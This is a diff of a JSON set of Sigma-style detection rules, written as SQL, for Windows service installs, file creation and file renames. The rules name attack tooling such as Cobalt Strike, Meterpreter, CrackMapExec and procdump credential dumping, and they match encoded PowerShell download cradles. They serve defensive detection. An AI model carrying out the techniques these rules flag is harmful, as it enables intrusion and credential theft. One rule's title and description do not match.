"falsepositives": [ - "Legitimate administrator activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" ], - "filename": "win_sshd_openssh_server_listening_on_socket.yml" + "filename": "file_event_win_susp_spool_drivers_color_drop.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", - "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", + "status": "experimental", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Opera.exe' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msteams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Slack.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "NetSupport Manager Service Install", - "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", - "status": "experimental", - "description": "Detects NetSupport Manager service installation on the target system.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND 
TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_service_install_netsupport_manager.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", "attack.privilege_escalation", - "car.2013-09-005", "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force 
mode", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE 
'%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "status": "test", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Highly unlikely" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' 
ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' 
OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": 
"win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1543" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": "test", - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", + "status": "experimental", + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron 
Systems), Subhash P (@pbssubhash)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "title": "Potential Persistence Via Notepad++ Plugins", + "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", + "status": "experimental", + "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". 
Which could indicates possible persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Possible FPs during first installation of Notepad++", + "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\target.exe' ESCAPE '\\' OR NewProcessName LIKE '%Installer.x64.exe' ESCAPE '\\'))))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_notepad_plus_plus_persistence.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": 
"91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Rename Common File to DLL File", + "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", + "author": "frack113", + "falsepositives": [ + "Application installation" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + ], + "filename": "file_rename_win_not_dll_to_dll.yml" + }, + { + "title": "Suspicious Appended 
Extension", + "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", + "status": "experimental", + "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1486" + ], + "falsepositives": [ + "Backup software" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" + ], + "filename": "file_rename_win_ransomware.yml" + }, + { + "title": "Unusual File Modification by 